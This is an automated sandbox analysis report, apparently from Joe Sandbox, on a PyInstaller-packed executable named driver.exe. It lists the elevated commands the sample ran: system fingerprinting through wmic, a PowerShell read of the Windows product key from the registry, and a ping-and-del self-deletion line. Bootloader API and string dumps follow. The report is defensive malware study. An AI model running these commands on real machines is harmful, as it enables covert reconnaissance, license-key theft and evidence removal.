Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic os get Caption
Imagebase:	0x7ff698260000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	81
Start time:	05:00:34
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	82
Start time:	05:00:34
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	83
Start time:	05:00:34
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic computersystem get totalphysicalmemory
Imagebase:	0x7ff698260000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	84
Start time:	05:00:35
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	85
Start time:	05:00:35
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	86
Start time:	05:00:35
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic csproduct get uuid
Imagebase:	0x7ff698260000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	87
Start time:	05:00:36
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	88
Start time:	05:00:36
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	89
Start time:	05:00:36
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	90
Start time:	05:00:37
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	91
Start time:	05:00:37
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	92
Start time:	05:00:37
Start date:	10/01/2025
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	wmic path win32_VideoController get name
Imagebase:	0x7ff698260000
File size:	576'000 bytes
MD5 hash:	C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	93
Start time:	05:00:38
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	94
Start time:	05:00:38
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	95
Start time:	05:00:38
Start date:	10/01/2025
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	96
Start time:	05:00:41
Start date:	10/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\driver.exe""
Imagebase:	0x7ff7546d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	97
Start time:	05:00:41
Start date:	10/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	98
Start time:	05:00:41
Start date:	10/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping localhost -n 3
Imagebase:	0x7ff6f41b0000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	19.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	39

Executed Functions

Function 00007FF6A29B8BD0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257
synchronizationwindowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6A29B9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6A29B45E4,00000000,00007FF6A29B1985), ref: 00007FF6A29B9439

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8C2B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8C46

Part of subcall function 00007FF6A29CA4EC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29CA500

Part of subcall function 00007FF6A29C878C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29C87F3

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8CD6
CreateProcessW.KERNELBASE ref: 00007FF6A29B8D0E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8D18

Part of subcall function 00007FF6A29B2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2C9E
Part of subcall function 00007FF6A29B2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF6A29B3706,?,00007FF6A29B3804), ref: 00007FF6A29B2D63
Part of subcall function 00007FF6A29B2C50: MessageBoxW.USER32 ref: 00007FF6A29B2D99

RegisterClassW.USER32 ref: 00007FF6A29B8D70
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8D7B
CreateWindowExW.USER32 ref: 00007FF6A29B8DC5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8DD7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8DF2
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E05
PeekMessageW.USER32 ref: 00007FF6A29B8E29
TranslateMessage.USER32 ref: 00007FF6A29B8E37
DispatchMessageW.USER32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E41
PeekMessageW.USER32 ref: 00007FF6A29B8E5C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E6E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E89
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8E9F
GetLastError.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8EA9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8EB7
DestroyWindow.USER32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B8FF4
GetExitCodeProcess.KERNELBASE ref: 00007FF6A29B9009
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B9012
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF6A29B3F7F), ref: 00007FF6A29B901F

Strings

PyInstallerOnefileHiddenWindow, xrefs: 00007FF6A29B8D44
Failed to create child process!, xrefs: 00007FF6A29B8D20
PyInstaller Onefile Hidden Window, xrefs: 00007FF6A29B8D85
CreateProcessW, xrefs: 00007FF6A29B8D27

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction ID: b0b0528cd220ea9c628e33689c8daac0aa9a44b99a1d1e5dd53f71b0a2577bba
Opcode Fuzzy Hash: f1b4a1f9842ac9cce6b2798ee34386867a7882a0850fd65476f94626d3f01840
Instruction Fuzzy Hash: 3FD1A532A4AB8286F7109F36E8542A977A1FF88F5CF400235DA5D83A96DF7CD105E740

Function 00007FF6A29B1000 Relevance: 61.8, APIs: 7, Strings: 28, Instructions: 509
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to load Tcl/Tk shared libraries for splash screen!, xrefs: 00007FF6A29B3EBB
Failed to remove temporary directory: %s, xrefs: 00007FF6A29B3FC3
Failed to start splash screen!, xrefs: 00007FF6A29B3ED4
pyi-disable-windowed-traceback, xrefs: 00007FF6A29B3BB2
Failed to convert DLL search path!, xrefs: 00007FF6A29B3DDC
Failed to initialize security descriptor for temporary directory!, xrefs: 00007FF6A29B3C61
_PYI_SPLASH_IPC, xrefs: 00007FF6A29B3A23, 00007FF6A29B3EF5
bye-runtime-tmpdir, xrefs: 00007FF6A29B3B68
pyi-python-flag, xrefs: 00007FF6A29B3AD6
PYINSTALLER_STRICT_UNPACK_MODE, xrefs: 00007FF6A29B3BE8
Could not side-load PyInstaller's PKG archive from external file (%s), xrefs: 00007FF6A29B39DE
Could not load PyInstaller's embedded PKG archive from the executable (%s), xrefs: 00007FF6A29B3971
Failed to load splash screen resources!, xrefs: 00007FF6A29B3E85
Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s, xrefs: 00007FF6A29B3B32
Could not create temporary directory!, xrefs: 00007FF6A29B3CBF
_PYI_ARCHIVE_FILE, xrefs: 00007FF6A29B38D2, 00007FF6A29B39FF
pyi-contents-directory, xrefs: 00007FF6A29B3B8D
_PYI_PARENT_PROCESS_LEVEL, xrefs: 00007FF6A29B3A17, 00007FF6A29B3A2F, 00007FF6A29B3A9B
PYINSTALLER_RESET_ENVIRONMENT, xrefs: 00007FF6A29B3882, 00007FF6A29B38AF
MEI, xrefs: 00007FF6A29B3933
PYINSTALLER_SUPPRESS_SPLASH_SCREEN, xrefs: 00007FF6A29B3E0A
pkg, xrefs: 00007FF6A29B39BE
VCRUNTIME140.dll, xrefs: 00007FF6A29B3DB1
Py_GIL_DISABLED, xrefs: 00007FF6A29B3AF4
Path exceeds PYI_PATH_MAX limit., xrefs: 00007FF6A29B3D12
_PYI_APPLICATION_HOME_DIR not set for onefile child process!, xrefs: 00007FF6A29B3D35
_PYI_APPLICATION_HOME_DIR, xrefs: 00007FF6A29B3A0B, 00007FF6A29B3CD4, 00007FF6A29B3F6B
Failed to unpack splash screen dependencies from PKG archive!, xrefs: 00007FF6A29B3EA6

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: ErrorFileLastModuleName
String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to load splash screen resources!$Failed to remove temporary directory: %s$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$Invalid value in _PYI_PARENT_PROCESS_LEVEL: %s$MEI$PYINSTALLER_RESET_ENVIRONMENT$PYINSTALLER_STRICT_UNPACK_MODE$PYINSTALLER_SUPPRESS_SPLASH_SCREEN$Path exceeds PYI_PATH_MAX limit.$Py_GIL_DISABLED$VCRUNTIME140.dll$_PYI_APPLICATION_HOME_DIR$_PYI_APPLICATION_HOME_DIR not set for onefile child process!$_PYI_ARCHIVE_FILE$_PYI_PARENT_PROCESS_LEVEL$_PYI_SPLASH_IPC$bye-runtime-tmpdir$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-python-flag
API String ID: 2776309574-3273434969
Opcode ID: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
Instruction ID: 1277dd79a844d1a4d0e827266c48365d8da19a83f5b3041addea4afc6c45984e
Opcode Fuzzy Hash: 230e5f2fbe18b706386c2e6c5de042c78cdf1bdf29ac743ce162c0a9040f007d
Instruction Fuzzy Hash: 52328B21A8E68291FA14EB26D4543B966A5EF44F88F844036DA5DC32C7EFACF558F304

Function 00007FF6A29D69D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6A29D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D6749
Part of subcall function 00007FF6A29D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D67C7
Part of subcall function 00007FF6A29D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D6818

CreateFileW.KERNELBASE ref: 00007FF6A29D6ADA
CreateFileW.KERNEL32 ref: 00007FF6A29D6B2A
GetLastError.KERNEL32 ref: 00007FF6A29D6B5A
GetFileType.KERNELBASE ref: 00007FF6A29D6B6F
GetLastError.KERNEL32 ref: 00007FF6A29D6B79
CloseHandle.KERNEL32 ref: 00007FF6A29D6BAC
CloseHandle.KERNEL32 ref: 00007FF6A29D6D0F
CreateFileW.KERNEL32 ref: 00007FF6A29D6D44
GetLastError.KERNEL32 ref: 00007FF6A29D6D53

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: fb2cdb28f41e68f012ac534de495ffc7873891c7934d432ecb014d89e333865d
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 9AC1D032B69A4185EB10CFA6D4902AC37A1FB49F9CB015239DE2E977D6CF78E451E300

Function 00007FF6A29B83B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B841B
RemoveDirectoryW.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B849E
DeleteFileW.KERNELBASE(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84BD
FindNextFileW.KERNELBASE(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84CB
FindClose.KERNEL32(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84DC
RemoveDirectoryW.KERNELBASE(?,00007FF6A29B8B09,00007FF6A29B3FA5), ref: 00007FF6A29B84E5

Strings

%s\*, xrefs: 00007FF6A29B83E2

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction ID: 7cc6a4d92746292e324e660eb2de845f3e9c3ac26a77af6037049b802c1b9b68
Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
Instruction Fuzzy Hash: F141A521A4E94285EA209B26E4981BD73A1FF98F98F400232D59DC36C7DFBCD546E701

Function 00007FF6A29B92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNELBASE ref: 00007FF6A29B9323
FindClose.KERNELBASE ref: 00007FF6A29B9332

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 56e463ebe583f942e15888af9eb7f4b722ca1549162f02616e21b2b73093e953
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 2BF0C832A5E74187F7608B61B45976A7390BB88B2CF044335D9AD466D6DFBCD048AA00

Function 00007FF6A29D0938 Relevance: 2.0, APIs: 1, Instructions: 461COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor
String ID:
API String ID: 1010374628-0
Opcode ID: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction ID: c946aace46ff629f1c7e40b5d05544f622ed4f4697b53f9485f5ff8ba1f2a122
Opcode Fuzzy Hash: 10bf4b1f0472125ada9b1d6b923a92a2d49e498fcbab652d34985a7b27debbff
Instruction Fuzzy Hash: 2002BC21E9F64244FAA9AB23A40527926D0AF05FA8F554635ED5DC7BD3DEFCB840B300

Function 00007FF6A29B1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6A29B7F80: _fread_nolock.LIBCMT ref: 00007FF6A29B802A

_fread_nolock.LIBCMT ref: 00007FF6A29B1A1B

Part of subcall function 00007FF6A29B2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6A29B1B6A), ref: 00007FF6A29B295E

Strings

fread, xrefs: 00007FF6A29B1A32, 00007FF6A29B1B5C
Could not allocate buffer for TOC!, xrefs: 00007FF6A29B1B1B
Failed to read cookie!, xrefs: 00007FF6A29B1A2B
MEI, xrefs: 00007FF6A29B1991
Error on file., xrefs: 00007FF6A29B1B8D
Failed to seek to cookie position!, xrefs: 00007FF6A29B19EE
Could not allocate memory for archive structure!, xrefs: 00007FF6A29B1A61
malloc, xrefs: 00007FF6A29B1B22
fseek, xrefs: 00007FF6A29B19F5
Could not read full TOC!, xrefs: 00007FF6A29B1B55
calloc, xrefs: 00007FF6A29B1A68

Memory Dump Source

Source File: 00000000.00000002.2467579900.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000000.00000002.2467463133.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467747299.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467837155.00007FF6A29F2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2467942191.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
Instruction ID: cb6eb3efc9c809685b3159172aaa5a70fe23eb464f4288205dfcd277276fc10c
Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
Instruction Fuzzy Hash: 0681C171A4E6868AEB60DB26D0512B923A1EF48F8CF404435E98DC778BDFBCE545B740

Function 00007FF6A29B1600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fread, xrefs: 00007FF6A29B17E6
fopen, xrefs: 00007FF6A29B1663
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6A29B17DF
Failed to extract %s: failed to open target file!, xrefs: 00007FF6A29B165C
malloc, xrefs: 00007FF6A29B1749
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6A29B17CA
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6A29B16A2
fwrite, xrefs: 00007FF6A29B17D1
Failed to create symbolic link %s!, xrefs: 00007FF6A29B1622
